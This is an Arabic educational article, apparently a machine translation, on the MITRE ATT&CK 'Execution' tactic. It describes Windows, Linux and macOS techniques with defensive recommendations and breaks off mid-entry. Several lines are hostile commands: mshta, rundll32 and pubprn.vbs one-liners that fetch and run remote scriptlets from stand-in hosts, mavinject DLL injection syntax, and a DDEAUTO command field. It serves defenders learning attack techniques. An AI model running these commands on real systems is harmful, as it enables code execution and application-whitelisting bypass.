روابط لجميع الأجزاء:الجزء 1. الحصول على الوصول الأولي (الوصول الأولي)الجزء 2. التنفيذالجزء 3. التثبيت (المثابرة)الجزء 4. تصعيد الامتيازالجزء 5. التهرب من الدفاعالجزء 6. الحصول على بيانات الاعتماد (وصول بيانات الاعتماد)الجزء 7. الاكتشافالجزء 8. الحركة الجانبيةالجزء 9. جمع البيانات (جمع)الجزء 10 الاستخراجالجزء 11. القيادة والسيطرةتصف مرحلة "التنفيذ" استخدام المهاجمين لوسائل وأساليب التنفيذ عن بُعد والمحلي في النظام المهاجم للعديد من الأوامر والنصوص والملفات القابلة للتنفيذ التي تم تسليمها إليها في المرحلة السابقة.
المؤلف غير مسؤول عن العواقب المحتملة لتطبيق المعلومات الواردة في المقالة ، ويعتذر أيضًا عن عدم الدقة المحتمل في بعض الصيغ والمصطلحات. المعلومات المنشورة هي رواية مجانية لمحتويات MITER ATT & CK.النظام: macOS
الحقوق: المستخدم
الوصف: تتمتع لغة AppleScript بالقدرة على العمل مع Apple Event - الرسائل المتبادلة بين التطبيقات كجزء من الاتصال بين العمليات (IPC). باستخدام Apple Event ، يمكنك التفاعل مع أي تطبيق تقريبًا مفتوح محليًا أو عن بُعد ، وتشغيل الأحداث مثل فتح النوافذ والضغط على المفاتيح. يتم تشغيل البرامج النصية باستخدام الأمر:
Osascript -e <script> .
يمكن للمهاجمين استخدام AppleScript لفتح اتصالات SSH سراً إلى المضيفين البعيدين ، مما يمنح المستخدمين مربعات حوار مزيفة. يمكن أيضًا استخدام AppleScript في أنواع الهجمات الأكثر شيوعًا ، مثل Reverse Shell enterprise.
توصيات الحماية: التحقق الإلزامي من تشغيل نصوص AppleScript لتوقيع مطور موثوق.
النظام: Windows
الحقوق: المستخدم
الوصف: مثبت ملف تعريف إدارة اتصال Microsoft (cmstp.exe) هو الأداة المساعدة "
مثبت ملف تعريف إدارة الاتصال " المضمنة في Windows. يمكن أن يأخذ Cmstp.exe ملف inf كمعلمة ، لذا يمكن للمهاجم تحضير ملف INF ضار خاص لتنزيل ملفات DLL أو البرامج النصية (* .sct) وتنفيذها من الخوادم البعيدة التي تتجاوز AppLocker وأقفال أخرى ، لأن cmstp.exe موقّع بشهادة Microsoft الرقمية.
توصيات الحماية: منع إطلاق التطبيقات التي يحتمل أن تكون خطرة. مراقبة بدء التشغيل
C: \ Windows \ System32 \ cmstp.exe .
النظام: Windows و Linux و macOS
الحقوق: المستخدم ، المسؤول ، النظام
الوصف: يمكنك التفاعل مع واجهة سطر الأوامر محليًا ، عن بُعد من خلال برنامج الوصول عن بُعد ، باستخدام Reverse Shell ، وما إلى ذلك. يتم تنفيذ الأوامر بمستوى الإذن الحالي لعملية واجهة سطر الأوامر ، إذا كان الأمر لا يتضمن استدعاء للعملية التي تغير الأذونات لتنفيذ الأمر (على سبيل المثال ، مهمة مجدولة).
توصيات الأمان: تدقيق و / أو قفل سطر الأوامر باستخدام أدوات مثل AppLocker أو سياسات تقييد البرامج.
النظام: Windows
الحقوق: المستخدم ، المسؤول ، النظام
الوصف: الأسلوب هو استخدام عناصر لوحة تحكم Windows من قبل المهاجمين لتنفيذ أوامر عشوائية كحمولة (على سبيل المثال ، فيروس
Reaver ). يمكن إخفاء الأشياء الضارة على أنها عناصر تحكم قياسية وتسليمها إلى النظام باستخدام مرفقات التصيّد. الأدوات المساعدة لعرض إعدادات Windows وتكوينها هي ملفات exe وملفات CPL مسجلة لعناصر لوحة تحكم Windows. تتم إعادة تسمية ملفات CPL في الواقع DLLs التي يمكن تشغيلها بالطرق التالية:
- مباشرة من سطر الأوامر: control.exe <file.cpl> ؛
- باستخدام وظائف API من shell32.dll: rundll32.exe shell32.dll ، Control_RunDLL <file.cpl> ؛
- انقر مرتين على ملف cpl.
يتم عرض قوائم CPL المسجلة المخزنة في System32 تلقائيًا في لوحة تحكم Windows ولها معرف فريد مخزّن في التسجيل:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpaceيتم تخزين معلومات حول CPLs الأخرى ، على سبيل المثال ، اسم العرض والمسار إلى ملف cpl ، في
أقسام Cpls و
Extended Properties من القسم:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Control Panelيتم تسجيل بعض CPLs التي تم إطلاقها من خلال الغلاف في القسم:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlersتوصية الحماية: تقييد تشغيل وتخزين ملفات عنصر لوحة التحكم فقط في المجلدات المحمية (على سبيل المثال ،
C: \ Windows \ System32 ) ، وتمكين التحكم في حساب المستخدم (UAC) و AppLocker لمنع التغييرات غير المصرح بها على النظام. بالطبع ، استخدام برامج مكافحة الفيروسات.
النظام: Windows
الحقوق: المستخدم
الوصف: DDE هو بروتوكول لتفاعل التطبيقات التي تشارك البيانات والذاكرة المشتركة للمراسلة. على سبيل المثال ، قد يحتوي مستند Word على جدول يتم تحديثه تلقائيًا من مستند Excel. تتمثل التقنية في استغلال ثغرة أمنية في تطبيقات MS Office المتعلقة باستخدام بروتوكول DDE في MS Office. يمكن للمهاجمين تضمين كائنات في مستندات MS Office تحتوي على أوامر سيتم تنفيذها عند فتح المستند. على سبيل المثال ، قد يحتوي مستند Word على كائن حقل تشير قيمته إلى الأمر
{DDEAUTO <command ، على سبيل المثال ، c: \ windows \ system32 \ cmd.exe>} ، والذي سيتم تنفيذه عند فتح المستند. على الرغم من فقدان الصلة ، يمكن تمكين DDE ، بما في ذلك في Windows 10 و MS Office 2016 ، باستخدام المفتاح:
AllowDDE (DWORD) = 2 في مفتاح التسجيل:
HKEY_CURRENT_USER \ Software \ Microsoft \ Office \ <إصدار Office> \ Word \ Security .
توصيات الحماية: اتبع
توصيات Microsoft وقم بتثبيت
تحديث MS Office المناسب. في Windows 10 ، يمكنك أيضًا تمكين معلمة
تقليل سطح الهجوم (ASR) لحماية نفسك من هجمات DDE والعمليات الفرعية بواسطة تطبيقات MS Office.
النظام: Windows
الحقوق: المستخدم ، المسؤول ، النظام
الوصف: يمكن للمهاجمين استخدام API لتنفيذ الملفات الثنائية. تسمح وظائف API مثل CreateProcess للبرامج والنصوص البرمجية ببدء العمليات من خلال تحديد المسارات والحجج اللازمة. وظائف API التي يمكن استخدامها لتنفيذ الملفات الثنائية:
- CreateProcessA ()، CreateProcessW ()؛
- CreateProcessAsUserA () ، CreateProcessAsUserW () ؛
- CreateProcessInternalA ()، CreateProcessInternalW ()؛
- CreateProcessWithLogonW () ، CreateProcessWithTokenW () ؛
- LoadLibraryA () ، LoadLibraryW () ؛
- LoadLibraryExA () ، LoadLibraryExW () ؛
- LoadModule () ؛
- LoadPackagedLibrary () ؛
- WinExec () ؛
- ShellExecuteA () ، ShellExecuteW () ؛
- ShellExecuteExA () و ShellExecuteExW ().
توصيات الحماية: تعد استدعاءات وظائف API حدثًا شائعًا يصعب التمييز بينه وبين النشاط الضار. يجب توجيه موجه الحماية لمنع بدء تشغيل أدوات المهاجم في بداية سلسلة الهجوم ، واكتشاف السلوك الضار وحظر البرامج التي يحتمل أن تكون خطرة.
النظام: Windows
الحقوق: المستخدم
الوصف: من الممكن تنظيم تنفيذ التعليمات البرمجية باستخدام محمل الوحدة النمطية لـ Windows - NTDLL.dll ، والذي يمكنه تحميل مكتبة DLL على مسار شبكة محلية أو مسار عشوائي. يعد NTDLL.dll جزءًا من Windows API ويمكنه استدعاء وظائف مثل
CreateProcess () و
LoadLibrary () .
توصيات الحماية: مكالمات وظيفة API هي وظائف نظام تشغيل عادية يصعب التمييز بينها وبين الأنشطة الضارة. يجب توجيه ناقل الحماية لمنع إطلاق أدوات المهاجم في بداية سلسلة الهجوم. من المنطقي وضع حد لتحميل DLLs إلى دلائل
٪ SystemRoot٪ و
٪ ProgramFiles٪ .
النظام: Windows و Linux و macOS
الحقوق: المستخدم
الوصف: تتضمن التقنية تنفيذ التعليمات البرمجية عن بُعد باستخدام مآثر في برنامج المستخدم. غالبًا ما يرتبط وجود الثغرات الأمنية في البرامج بانتهاك مطوري البرامج لمتطلبات البرمجة الآمنة ، مما يؤدي في النهاية إلى احتمال التسبب في سلوك غير متوقع للبرامج.
فكر في بعض أنواع برمجيات إكسبلويت:
- يستغل المتصفح. متصفحات الويب هي الهدف عندما يستخدم المهاجمون روابط التحميل والتصيد الاحتياليين. يمكن اختراق النظام الذي تمت مهاجمته من خلال متصفح عادي بعد قيام المستخدم بتنفيذ إجراءات معينة ، على سبيل المثال ، اتباع الرابط المحدد في البريد الإلكتروني المخادع.
- يستغل تطبيق Office. يتم نقل الملفات الضارة كمرفقات أو روابط تنزيل. لاستغلال الثغرة الأمنية ، يجب على المستخدم فتح مستند أو ملف لتشغيل برمجية إكسبلويت.
- مآثر تطبيق طرف ثالث. التطبيقات الشائعة ، مثل Adobe Reader و Flash ، التي تُستخدم غالبًا في بيئات الشركات ، مستهدفة من قِبل المجرمين الإلكترونيين. اعتمادًا على البرنامج وطبيعة الثغرة الأمنية ، يتم استغلال الثغرات الأمنية في متصفح أو عندما يفتح المستخدم ملفًا ، على سبيل المثال ، يمكن تسليم كائنات الفلاش في مستندات MS Office.
توصيات الحماية: تثبيت التحديثات للتطبيقات المستخدمة في الوقت المناسب. استخدام وسائل مختلفة لعزل التطبيقات التي من المحتمل أن تكون عرضة للإصابة - مثل وضع الحماية ، وأدوات التحجيم المصغر والأدوات الافتراضية ، على سبيل المثال ،
Sandboxie لـ Windows و Apparmor ، Docker لنظام Linux. يوصى أيضًا بأنظمة الحماية من
الاستغلال مثل
Windows Defender Exploit Guard (WDEG) لنظام التشغيل Windows 10 أو
مجموعة أدوات تجربة التخفيف المحسنة (EMET) للإصدارات السابقة من Windows.
النظام: Windows و Linux و macOS
الحقوق: المستخدم ، المسؤول ، النظام
الوصف: يتم تشغيل ملف أو برنامج نصي قابل للتنفيذ عند التفاعل مع ملف من خلال واجهة مستخدم رسومية (GUI) في جلسة تفاعلية أو بعيدة ، على سبيل المثال ، عبر بروتوكول RDP.
نصائح
الأمان: حماية بيانات الاعتماد التي يمكن استخدامها للاتصال عن بعد بالنظام. حدد أدوات النظام غير الضرورية ، وهي برامج تابعة لجهة خارجية يمكن استخدامها للدخول في الوضع البعيد التفاعلي.
النظام: Windows
الحقوق: المستخدم
الوصف: InstallUtil هو أداة مساعدة لسطر أوامر Windows يمكنها تثبيت وإلغاء تثبيت التطبيقات التي تتوافق مع مواصفات .NET Framework. يتم تثبيت Installutil تلقائيًا باستخدام VisualStudio. تم توقيع ملف InstallUtil.exe بواسطة شهادة Microsoft وتم تخزينه في:
C: \ Windows \ Microsoft.NET \ Framework \ v [نسخة] \ InstallUtil.exeيمكن للمهاجمين استخدام وظيفة InstallUtil لتنفيذ شفرة الوكيل وتجاوز القوائم البيضاء للتطبيق.
توصيات الحماية: من الممكن ألا يتم استخدام InstallUtil على نظامك ، لذا فكّر في حظر تثبيت InstallUtil.exe.
النظام: Windows
الحقوق: مسؤول النظام
الوصف: Local Security Authority (LSA) هو نظام فرعي لـ Windows يوفر مصادقة المستخدم. يتضمن LSA العديد من مكتبات DLL الديناميكية المترابطة التي يتم تشغيلها في عملية LSASS.exe. يمكن للمهاجمين مهاجمة LSASS.exe عن طريق استبدال أو إضافة برامج تشغيل LSA غير مشروعة ثم تنفيذ التعليمات البرمجية التعسفية. يتم تنفيذ هذه التقنية في البرامج الضارة Pasam و Wingbird ، والتي "ترفع" ملفات DLL المعدلة المستخدمة لتحميل LSASS. في هذه الحالة ، يتم تنفيذ التعليمات البرمجية الضارة قبل أن يتسبب DLL غير الشرعي في حدوث تعطل وتعطل خدمة LSASS اللاحق.
توصيات الحماية: في Windows 8.1 و Windows Server 2012 R2 ، قم بتمكين حماية LSA عن طريق تعيين مفتاح التسجيل:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ RunAsPPLإلى قيمة
الكلمة المزدوجة: 00000001تضمن هذه الحماية توقيع المكونات الإضافية وبرامج التشغيل التي يتم تحميلها بواسطة LSA رقميًا بواسطة Microsoft. في Windows 10 و Server 2016 ، قم بتمكين
Windows Defender Credential Guard من تشغيل lsass.exe في بيئة افتراضية معزولة. قم بتشغيل وضع بحث DLL الآمن لتقليل مخاطر تحميل المكتبات الضارة إلى lsass.exe:
HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Session Manager \ SafeDllSearchMode .
النظام: macOS
الحقوق: المستخدم ، المسؤول
الوصف: Launchctl - أداة مساعدة لإدارة خدمة Launchd. باستخدام Launchctl ، يمكنك إدارة خدمات النظام والمستخدم (LaunchDeamons و LaunchAgents) ، بالإضافة إلى تنفيذ الأوامر والبرامج. Launchctl يدعم الأوامر الفرعية لسطر الأوامر ، التفاعلية أو المعاد توجيهها من المدخلات القياسية:
launchctl إرسال -l [labelname] - / Path / to / thing / to / تنفيذ '' arg '' '' arg '' 'arg' .
من خلال بدء الخدمات وإعادة تشغيلها ، يمكن للمهاجمين تنفيذ التعليمات البرمجية وحتى تجاوز القائمة البيضاء إذا كانت عملية الإطلاق عبارة عن عملية مصرح بها ، ولكن قد يتطلب تحميل الخدمات وإلغاء تحميلها وإعادة تشغيلها والامتيازات امتيازات مرتفعة.
توصيات الأمان: تقييد حقوق المستخدم لإنشاء عوامل التشغيل وبدء تشغيل Deamons باستخدام نهج المجموعة. باستخدام تطبيق
KnockKnock ،
يمكنك اكتشاف البرامج التي تستخدم Launchctl لإدارة وكلاء التشغيل و Deamons Launch.
النظام: Linux و macOS
الحقوق: المستخدم ، المسؤول ، الجذر
الوصف: يمكن للمهاجمين إنشاء مهام في الأنظمة التي تمت مهاجمتها للإطلاق غير المصرح به للبرامج عند تشغيل النظام أو وفقًا لجدول زمني. تدعم أنظمة Linux و Apple عدة طرق لجدولة إطلاق مهام الخلفية الدورية: cron ، at ، launchd. على عكس برنامج جدولة المهام لـ Windows ، لا يمكن إجراء جدولة المهام على أنظمة Linux عن بُعد ، باستثناء استخدام جلسات العمل عن بُعد مثل SSH.
توصيات الحماية: تحديد حقوق المستخدم لإنشاء مهام مجدولة وحظر أدوات النظام والبرامج الأخرى التي يمكن استخدامها لجدولة المهام.
النظام: Windows
الحقوق: المستخدم
الوصف: Mshta.exe (الموجود في
C: \ Windows \ System32 \ ) هو أداة مساعدة تقوم بتشغيل تطبيقات Microsoft HTML (* .HTA). تعمل تطبيقات HTA باستخدام نفس التقنيات التي يستخدمها InternetExplorer ، ولكن خارج المتصفح. نظرًا لحقيقة أن Mshta يعالج الملفات التي تتجاوز إعدادات أمان المستعرض ، يمكن للمهاجمين استخدام mshta.exe لتوكيل تنفيذ ملفات HTA الضارة أو Javascript أو VBScript. يمكن تشغيل الملف الضار عبر البرنامج النصي المدمج:
mshta vbscript: Close (تنفيذ ("GetObject (" "script: https [:] // webserver / payload [.] sct" ")"))أو مباشرة على عنوان URL:
mshta http [:] // webserver / payload [.] htaتوصيات الحماية: ترتبط وظيفة mshta.exe بالإصدارات القديمة من IE التي وصلت إلى نهاية دورة حياتها. حظر Mshta.exe إذا كنت لا تستخدم وظائفه.
النظام: Windows
الحقوق: المستخدم ، المسؤول
الوصف: يعد PowerShell (PS) واجهة سطر أوامر تفاعلية قوية وبيئة برمجة نصية مضمنة في Windows. يمكن للمهاجمين استخدام PS لجمع المعلومات وتنفيذ التعليمات البرمجية. على سبيل المثال ، يمكن أن تبدأ cmdlet Start-Process cmdlet ملفًا قابلاً للتنفيذ ؛ وسوف ينفذ الأمر Invoke-Command cmdlet الأمر محليًا أو على كمبيوتر بعيد. يمكن أيضًا استخدام PS لتنزيل الملفات القابلة للتنفيذ وتشغيلها من الإنترنت ، دون حفظها على محرك الأقراص الثابتة. بالنسبة للاتصالات البعيدة باستخدام PS ، فإنك تحتاج إلى حقوق المسؤول. هناك عدد من الأدوات لمهاجمة PS:
توصيات الحماية: يمكن إزالة PS من النظام إذا لم يكن ذلك ضروريًا. إذا كان PS مطلوبًا ، فيجب أن يقتصر المسؤولون على تشغيله فقط عن طريق تشغيل البرامج النصية الموقعة. قم بتعطيل خدمة WinRM لمنع تنفيذ البرامج النصية PS عن بعد. وتجدر الإشارة إلى أن هناك
طرقًا لتجاوز سياسات تنفيذ البرنامج النصي PS .
النظام: Windows
الحقوق: المستخدم ، المسؤول
الوصف: Regsvcs و Regasm هي أدوات مساعدة من Windows تستخدم للتسجيل مع نظام تجميع طراز كائن المكون (COM) .NET. تم توقيع كلا الملفين رقمياً بواسطة Microsoft. يمكن للمهاجمين استخدام Regsvcs و Regasm لتنفيذ تنفيذ التعليمات البرمجية الوكيل عندما تكون السمة هي الرمز الذي يجب تشغيله قبل التسجيل أو إلغاء التسجيل: [ComRegisterFunction] أو [ComUnregisterFunction]. يمكن تشغيل التعليمات البرمجية بمثل هذه السمات حتى إذا تم تشغيل العملية بامتيازات غير كافية أو حتى تعطل عند بدء التشغيل.
توصيات الحماية: قم بحظر Regsvcs.exe و Regasm.exe إذا لم يتم استخدامها على النظام أو الشبكة الخاصة بك.
النظام: Windows
الحقوق: المستخدم ، المسؤول
الوصف: Regsvr32.exe هو أداة مساعدة وحدة تحكم لتسجيل وإلغاء تسجيل عناصر تحكم OLE ، مثل ActiveX و DLLs ، في التسجيل. تم توقيع Regsvr32.exe رقمياً من قبل Microsoft ويمكن استخدامه لتنفيذ التعليمات البرمجية الوكيل. على سبيل المثال ، باستخدام Regsvr32 ، يمكنك تنزيل ملف XML يحتوي على أجزاء من كود Java (scriptlets) ستتجاوز القائمة البيضاء.
توصيات الحماية: يمكن أن يؤدي الهجوم على تقليل السطح (ASR) في "مجموعة الأدوات لتجربة تقليل الأثر المحسّنة" و "حماية متقدمة من القلب" في Windows Defender إلى حظر استخدام Regsvr32.exe لتجاوز القوائم البيضاء.
النظام: Windows
الحقوق: المستخدم
الوصف: Rundll32.exe هو أداة مساعدة للنظام لبدء تشغيل البرامج الموجودة في المكتبات المتصلة ديناميكيًا ، ويمكن استدعاؤه إلى وكيل الملف الثنائي وتنفيذ ملفات التحكم في Windows (.cpl) من خلال وظائف shel32.dll غير الموثقة -
Control_RunDLL و
Control_RunDLLAsUser . يؤدي النقر المزدوج فوق ملف .cpl أيضًا إلى تنفيذ Rundll32.exe. يمكن أيضًا استخدام Rundll32 لتنفيذ البرامج النصية مثل JavaScript:
rundll32.exe javascript: "\ .. \ mshtml، RunHTMLApplication"؛ document.write ()؛ GetObject ("scrirpt: https [:] // www [.] example [.] com / malicious.sct") "تم الكشف عن الطريقة المذكورة أعلاه لاستخدام rundll32.exe بواسطة برامج مكافحة الفيروسات مثل فيروس مثل Poweliks.
توصيات الحماية: يمكن أن يؤدي الهجوم على تقليل السطح (ASR) في "مجموعة الأدوات لتجربة تقليل الأثر المحسّنة" و "حماية القلب المتقدمة" في Windows Defender إلى حظر استخدام Rundll32.exe لتجاوز القائمة البيضاء.
النظام: Windows
الحقوق: المستخدم ، المسؤول ، النظام
الوصف: يمكن استخدام الأدوات المساعدة مثل at و schtasks و Windows Task Scheduler لجدولة البرامج والنصوص البرمجية ليتم تشغيلها في تاريخ ووقت محددين. يمكن جدولة مهمة على نظام بعيد ، شريطة استخدام RPC للمصادقة وتمكين مشاركة الملفات والطابعات. بالإضافة إلى ذلك ، حقوق المسؤول مطلوبة لجدولة المهام على نظام بعيد. يمكن للمهاجمين استخدام جدولة المهام عن بعد لتنفيذ البرامج عند بدء تشغيل النظام أو في سياق حساب معين.توصيات الحماية: قم بتشغيل تقييد الحقوق لإنشاء المهام للمستخدمين نيابة عن النظام في التسجيل:HKLM \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ SubmitControl = 0ملاحظة:SubmitControl = 1 ، يسمح لأعضاء مجموعة مشغلي الخادم بإنشاء وظائف.أيضا ، قم بتكوين GPO المناسب:تكوين الكمبيوتر> [السياسات]> إعدادات Windows> إعدادات الأمان> السياسات المحلية> خيارات الأمان: وحدة تحكم المجال: السماح لمشغلي الخادم بجدولة المهام: تعطيلتكوين الكمبيوتر> [السياسات]> إعدادات Windows> إعدادات الأمان> محلي السياسات> تعيين حقوق المستخدم: زيادة أولوية الجدولةضع في اعتبارك استخدام PowerSploit Framework ، الذي يحتوي على وحدة PowerUP للعثور على الثغرات الأمنية في حل المهام المجدولة ، في نشاطك.النظام: Windows ، Linux ،حقوق macOS :وصف المستخدم : يمكن للمهاجمين استخدام البرامج النصية لأتمتة إجراءاتهم ، وتسريع المهام التشغيلية ، ونتيجة لذلك ، تقليل الوقت المطلوب للوصول. يمكن استخدام بعض لغات البرمجة النصية لتجاوز آليات مراقبة العمليات من خلال التفاعل المباشر مع نظام التشغيل على مستوى API بدلاً من استدعاء برامج أخرى. يمكن تضمين البرامج النصية في مستندات Office كوحدات ماكرو ثم استخدامها في هجمات التصيد الاحتيالي. في هذه الحالة ، يتوقع المهاجمون أن يقوم المستخدم بتشغيل ملف الماكرو أو أن يوافق المستخدم على تنشيط الماكرو. هناك العديد من الأطر الشائعة لتنفيذ البرمجة النصية - Metasploit ، Veil ، PowerSploit.نصائح أمنية: تقييد الوصول إلى البرامج النصية مثل VBScript أو PowerShell. في Windows ، قم بتكوين إعدادات أمان MS Office من خلال تمكين العرض الآمن وحظر الماكرو من خلال GPO. إذا كانت هناك حاجة إلى وحدات ماكرو ، فلن تسمح إلا بتشغيل وحدات الماكرو الموقعة رقمياً الموثوق بها. استخدم التقسيم الجزئي والمحاكاة الافتراضية للتطبيقات ، على سبيل المثال ، Sandboxie لنظام التشغيل Windows و Apparmor و Docker لنظام Linux.النظام: حقوق Windows : Administrator ،وصف النظام : يمكن للمهاجمين تنفيذ رمز ثنائي أو أمر أو نص برمجي باستخدام طرق خاصة للتفاعل مع خدمات Windows ، على سبيل المثال ، باستخدام إدارة التحكم بالخدمة (SCM) ، يمكنك إنشاء خدمات جديدة وتعديل الخدمات قيد التشغيل.توصيات الحماية:تأكد من أن إعداد الامتيازات الحالي على النظام يحظر إطلاق الخدمات ذات الامتيازات العالية من المستخدمين ذوي الامتيازات المنخفضة. تأكد من أن الملفات القابلة للتنفيذ ذات الأذونات العالية على النظام لا يمكن استبدالها أو تعديلها من قبل المستخدمين الذين لديهم أذونات أقل. فكر في استخدام أدوات لتقييد إطلاق البرامج التي يحتمل أن تكون خطرة باستخدام AppLocker وتكوين سياسات تقييد البرامج .النظام: حقوق Windows :وصف المستخدم : يمكن تشغيل الملفات الثنائية الموقعة بشهادات رقمية موثوق بها على أنظمة Windows المحمية بواسطة التحقق من التوقيع الرقمي. يمكن استخدام العديد من ملفات Microsoft التي تم توقيعها افتراضيًا أثناء تثبيت Windows لتدشين تشغيل الملفات الأخرى: يعدMavinject.exe أداة Windows المساعدة التي تسمح بتنفيذ التعليمات البرمجية. يمكن استخدام Mavinject لإدخال مكتبة الارتباط الحيوي (DLL) في عملية التشغيل:"C: \ Program Files \ Common Files \ microsoft Shared \ ClickToRun \ MavInject32.exe" [PID] / INJECTRUNNING [PATH DLL]C: \ Windows \ system32 \ mavinject.exe [PID ] / INJECTRUNNING [PATH DLL]SyncAppvPublishingServer.exe- يمكن استخدامه لتشغيل البرامج النصية powershell دون تشغيل powershell.exe.هناك العديد من الثنائيات المشابهة .توصيات الحماية: قد لا يتم استخدام العديد من الملفات الموقعة على نظامك ، لذا فكّر في حظر تشغيلها.النظام: حقوق Windows :وصف المستخدمين : يمكن استخدام البرامج النصية الموقعة بشهادات موثوق بها لبروكيل الملفات الضارة ، على سبيل المثال ، تم توقيع PubPrn.vbs بشهادة Microsoft ويمكن استخدامها لتشغيل ملف من خادم بعيد:cscript C: \ Windows \ System32 \ Printing_Admin_Scripts \ البرنامج النصي ru-RU \ pubprn.vbs 127.0.0.1: http [:] // 192.168.1.100/hi.pngتوصيات الحماية: قد لا تكون مثل هذه البرامج النصية الموقعة مطلوبة على نظامك ، لذا فكّر في حظر تشغيلها.النظام: حقوق Linux و macOS :وصف المستخدم : Source هو أمر يسمح لك بقراءة وتنفيذ جميع الأوامر من الملف المحدد في shell الأمر الحالي ، مما يعني أن جميع متغيرات البيئة المحددة ستكون مرئية في جميع البرامج النصية والأوامر التي سيتم إطلاقها. يمكن بدءالمصدر بطريقتين: المصدر / المسار / إلى / اسم الملف [الوسائط] أو . / المسار / إلى / اسم الملف [الوسيطات]لاحظ المسافة بعد النقطة. بدون مساحة ، سيتم إطلاق البرنامج في أمر قيادة جديد. يمكن للمهاجمين استخدام Source لتنفيذ الملفات التي لم يتم وضع علامة "x" عليها كملفات قابلة للتنفيذ.توصيات الحماية: لمنع استخدام الأوامر المضمنة في النظام أمر صعب للغاية بسبب شرعيتها ، لذلك ، يجب توجيه ناقل الحماية لمنع الإجراءات الخبيثة في المراحل المبكرة من الهجوم ، على سبيل المثال ، في مرحلة التسليم أو إنشاء ملف ضار في النظام.النظام: Linux،حقوق macOS : وصف المستخدم:يمكن للمهاجمين إخفاء النوع الحقيقي للملف بتغيير امتداده. بالنسبة لأنواع معينة من الملفات (لا تعمل مع ملفات app.) ، فإن إضافة حرف مسافة إلى نهاية اسم الملف سيغير طريقة معالجة الملف بواسطة نظام التشغيل. على سبيل المثال ، إذا كان هناك ملف قابل للتنفيذ Mach-O يحمل اسم evil.bin ، فعندما ينقر المستخدم نقرًا مزدوجًا ، سيقوم نظام التشغيل بتشغيل Terminal.app وتنفيذه. إذا تمت إعادة تسمية الملف نفسه إلى evil.txt ، فسيبدأ بنقر مزدوج في محرر نصوص. ومع ذلك ، إذا تمت إعادة تسمية الملف إلى "evil.txt" (مسافة في النهاية) ، فعند النقر المزدوج على نوع الملف الحقيقي ، سيتم تحديد نظام التشغيل وسيبدأ تشغيل الملف الثنائي. يمكن للمهاجمين استخدام هذه التقنية لخداع مستخدم لبدء تشغيل ملف قابل للتنفيذ ضار.توصيات الحماية:من الصعب منع استخدام هذه التقنية بسبب يستخدم المهاجم آليات التشغيل القياسية لنظام التشغيل ، لذا يجب أن يهدف ناقل الحماية إلى منع الإجراءات الضارة في المراحل المبكرة من الهجوم ، على سبيل المثال ، في مرحلة التسليم أو إنشاء ملف ضار في النظام.النظام: Windows ، Linux ،حقوق macOS : المستخدم ، المسؤول ،وصف النظام : يتم توجيه متجه الهجوم إلى برامج نشر البرامج وبرامج الطرف الثالث التي يتم استخدامها في الشبكة المهاجمة لأغراض إدارية (SCCM ، VNC ، HBSS ، Altris ، إلخ). إذا تمكن أحد المهاجمين من الوصول إلى هذه الأنظمة ، فسيكون الخصم قادرًا على تشغيل التعليمات البرمجية عن بُعد على جميع المضيفين المتصلين بنظام نشر البرنامج. تعتمد الحقوق المطلوبة لتنفيذ هذه التقنية على تكوين نظام معين. قد تكون أوراق الاعتماد المحلية كافية للوصول إلى خادم نشر البرنامج ؛ ومع ذلك ، قد يلزم حساب مسؤول لبدء نشر البرنامج.توصيات الحماية:تحقق من مستوى الأمان لأنظمة نشر البرامج الخاصة بك. تأكد من أن الوصول إلى أنظمة إدارة البرامج محدود ويتم التحكم فيه وحمايته. الاستخدام الصارم لسياسات الموافقة المسبقة الإلزامية لنشر البرامج عن بُعد. توفير الوصول إلى أنظمة نشر البرامج لعدد محدود من المسؤولين ، وضمان عزل نظام نشر البرامج. تأكد من أن بيانات اعتماد الوصول إلى نظام نشر البرامج فريدة ولا يتم استخدامها في الخدمات الأخرى على شبكة الشركة. إذا تم تكوين نظام نشر البرنامج لتشغيل الملفات الثنائية الموقعة فقط ، فتحقق من أن الشهادات الموثوق بها لا يتم تخزينها في نظام نشر البرنامج نفسه ، ولكنها موجودة على نظام لا يمكن الوصول إليه عن بُعد.النظام: حقوق Linux و macOS : المستخدم والمسؤولالوصف: يُستخدم الأمر trap لحماية البرنامج النصي من المقاطعات (ctrl + c و ctrl + d و ctrl + z وما إلى ذلك). إذا تلقى البرنامج النصي إشارة مقاطعة محددة في وسيطات الأمر trap ، فإنه يعالج إشارة المقاطعة من تلقاء نفسه ، في حين أن shell لن يعالج مثل هذه الإشارة. يمكن للمهاجمين استخدام المصيدة لتسجيل الشفرة التي سيتم تنفيذها عندما تتلقى القشرة إشارات مقاطعة معينة.توصيات الحماية:من الصعب منع استخدام هذه التقنية ، لأن المهاجم يستخدم الآليات القياسية لنظام التشغيل. يجب أن يهدف ناقل الحماية إلى منع الأعمال الضارة في المراحل المبكرة من الهجوم ، على سبيل المثال ، في مرحلة التسليم أو إنشاء ملف ضار في النظام.النظام: حقوق Windows :وصف المستخدم : هناك العديد من الأدوات المساعدة التي يستخدمها مطورو البرامج والتي يمكن استخدامها لتنفيذ التعليمات البرمجية بأشكال مختلفة في تطوير البرامج وتصحيحها وهندستها العكسية. غالبًا ما يتم توقيع هذه الأدوات المساعدة باستخدام الشهادات الرقمية التي تسمح لها بتوكيل التعليمات البرمجية الضارة في نظام التشغيل ، وتجاوز آليات الأمان والأوراق البيضاء للتطبيقات.مسابليدهي عبارة عن منصة لتطوير البرمجيات مستخدمة في Visual Studio. يستخدم المشاريع على شكل ملفات XML التي تصف متطلبات بناء منصات وتكوينات مختلفة. يسمح لك MSBuild من .NET الإصدار 4 بإدراج رمز C # في مشروع XML ، وتجميعه ، ثم تنفيذه. تم توقيع MSBulid.exe بواسطة Microsoft Digital Certificate.DNX - .Net Execution Environmant (dnx.exe) عبارة عن مجموعة تطوير لـ Visual Studio Enterprise. توقف منذ .NET Core CLI في عام 2016. DNX مفقود من إصدارات Windows القياسية ولا يمكن أن يكون موجودًا إلا على مضيفي المطورين عند استخدام .Net Core و ASP.NET Core 1.0. تم توقيع Dnx.exe رقمياً ويمكن استخدامه لمراجعة تنفيذ التعليمات البرمجية الوكيل.RCSI- واجهة سطر 